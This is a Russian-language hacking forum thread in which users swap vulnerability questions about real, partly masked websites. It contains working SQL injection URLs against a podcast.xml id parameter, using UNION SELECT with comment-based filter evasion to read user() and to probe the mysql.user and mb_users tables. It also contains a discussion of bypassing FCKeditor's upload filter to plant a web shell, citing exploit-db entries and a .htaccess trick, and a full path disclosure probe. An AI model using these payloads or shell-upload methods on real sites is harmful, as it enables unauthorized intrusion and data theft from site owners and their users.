Вопросы по уязвимостям

[avenu]

2 snake
мб с выводом попроще буит ?

Код:

http://www.***.com/podcast.xml?id=3160+limit+0+union/**/select+1,2,3,4,5,/*!user()*/,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+

к mysql.user доступа нет вроде

Код:

http://www.***.com/podcast.xml?id=3160+limit+0+union/**/select+1,2,3,4,5,/*!user()*/,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+/*!from*/+/*!mysql.user*/--+

а на mb_users и вовсе кажеццо фильтр стоит =\

Код:

http://www.***.com/podcast.xml?id=3160+limit+0+union/**/select+1,2,3,4,5,/*!user()*/,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+/*!from*/+/*!mb_users*/--+

[snake]

и на user_password?Но как то ж я набрутил таблицы,значит доступ есть и фильтра нет.Вобщем ладно.Спасибо за помощь.

[Nightmare]

Кто нибудь в курсе, FCKeditor можно ли как нибудь обмануть и залить шелл через него?
Если на сайте доступен: FCKeditor/editor/filemanager/connectors/php/upload.php
Можно было бы что нибудь придумать, если бы не блокировка всех неизвестных приложению расширений.... пока на этот счёт мыслей никаких... с нулл байтом тож...

[col]

http://www.exploit-db.com/exploits/17644/
сам не проверял, просто видел мельком

[Pashkela]

Цитата:

если бы не блокировка всех неизвестных приложению расширений

Цитата:

http://www.exploit-db.com/exploits/17644/
сам не проверял, просто видел мельком

.htaccess конечно крутой способ для all versian, но вряд ли имеется в списке разрешенных расширений

[Andrey1800]

в fckeditor до 2.4.3 есть возможность залить любой файл с любым расширением, http://www.exploit-db.com/exploits/15484/ , там для Media не указаны расширения.
версию глянуть можно в fckeditor.js

upd. не покатит, путь говорит о версии >=2.5

[salut]

ето что за ошибка ?
sqli?

Цитата:

http://www.***.am/en/?nid=324'a

[Pashkela]

Full Path Disclosure это

[salut]

немного подробнее можно?
просто знаем path ,или что можно зделать с етим ?

[[wh]]

Цитата:

просто знаем path ,

Да.

Цитата:

немного подробнее можно?

Почитай это.